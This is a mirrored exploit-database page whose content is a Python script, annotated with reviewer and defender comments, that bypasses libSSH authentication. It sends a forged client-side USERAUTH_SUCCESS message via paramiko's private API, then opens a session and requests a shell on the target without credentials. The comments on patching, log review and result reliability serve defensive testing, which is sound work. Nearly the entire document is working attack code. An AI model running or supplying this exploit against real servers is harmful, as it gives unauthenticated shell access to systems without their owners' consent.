libSSH – Authentication Bypass

  • 作者: Dayanç Soyadlı
    日期: 2018-10-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45638/
  • #!/usr/bin/env python3
    import paramiko
    import socket
    import argparse
    from sys import argv, exit
    
    
    # Command-line interface: target host, SSH port and paramiko log file.
    # --host has no default and is not marked required, so args.host is None
    # when the option is omitted.
    parser = argparse.ArgumentParser(
        description="libSSH Authentication Bypass",
    )
    parser.add_argument(
        '--host',
        help='Host',
    )
    # The port arrives as a str when given on the command line and as the
    # int 22 otherwise; the connect call converts it with int().
    parser.add_argument(
        '-p', '--port',
        help='libSSH port',
        default=22,
    )
    parser.add_argument(
        '-log', '--logfile',
        help='Logfile to write conn logs',
        default="paramiko.log",
    )

    # Parsed at module import time; the functions below read this namespace.
    args = parser.parse_args()
    
    
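    def BypasslibSSHwithoutcredentials(hostname, port):
        """Check whether an SSH server accepts a client-sent USERAUTH_SUCCESS.

        After the transport is negotiated, the client sends the
        USERAUTH_SUCCESS message itself instead of an authentication request,
        then asks for a session channel and a shell. That message is meant to
        travel from server to client only, so a server that goes on to grant
        the session is treating an unauthenticated peer as logged in.

        Defender notes: a server for which this returns 0 is affected and needs
        a libssh release that contains the fix (see the vendor advisory for the
        exact version). Until it is patched, restrict network access to the
        service and review server logs for sessions that have no preceding
        successful authentication record.

        Args:
            hostname: Host name or address of the SSH server (passed to str()).
            port: TCP port of the SSH server (passed to int()).

        Returns:
            0 if the session channel and shell request were accepted,
            1 if paramiko raised an SSHException or the TCP connection failed.
        """
        sock = socket.socket()
        transport = None
        try:
            sock.connect((str(hostname), int(port)))

            message = paramiko.message.Message()
            transport = paramiko.transport.Transport(sock)
            # Runs the normal client-side negotiation; no credentials involved.
            transport.start_client()

            # A single-byte message carrying only the USERAUTH_SUCCESS type,
            # sent through paramiko's private _send_message because the public
            # API offers no way for a client to emit it.
            message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
            transport._send_message(message)

            # Nothing is read from or written to the channel: acceptance of the
            # session and shell requests is the only signal used.
            spawncmd = transport.open_session()
            spawncmd.invoke_shell()
            return 0

        except paramiko.SSHException:
            # NOTE(review): every SSHException lands here (failed negotiation,
            # rejected channel, ...), so "Not Vulnerable" is a best guess and
            # not a verdict; confirm the installed libssh version before
            # closing a finding on this output alone.
            print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
            return 1
        except socket.error:
            print("Unable to connect.")
            return 1
        finally:
            # The original never released the transport or the socket; close
            # both on every path so repeated checks do not leak descriptors.
            if transport is not None:
                transport.close()
            sock.close()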
    
    
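    def main():
        """Run the check against the host named on the command line.

        Returns:
            1 when no --host value was supplied (usage is printed instead),
            otherwise the status from BypasslibSSHwithoutcredentials, which the
            caller hands to exit() as the process exit code.
        """
        # paramiko's connection-level log goes to the file chosen with
        # -log/--logfile.
        paramiko.util.log_to_file(args.logfile)

        # argparse sets args.host to None when --host is omitted. Reading the
        # attribute never raises, so the original bare try/except could not
        # trigger the usage message; test the value instead.
        if not args.host:
            parser.print_help()
            return 1

        # Return the result so the exit status reflects the outcome. The
        # original dropped it and the process always exited with 0.
        return BypasslibSSHwithoutcredentials(args.host, args.port)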
    
    # Script entry point: main()'s return value becomes the process exit
    # status (a None return maps to exit status 0).
    if __name__ == '__main__':
        raise SystemExit(main())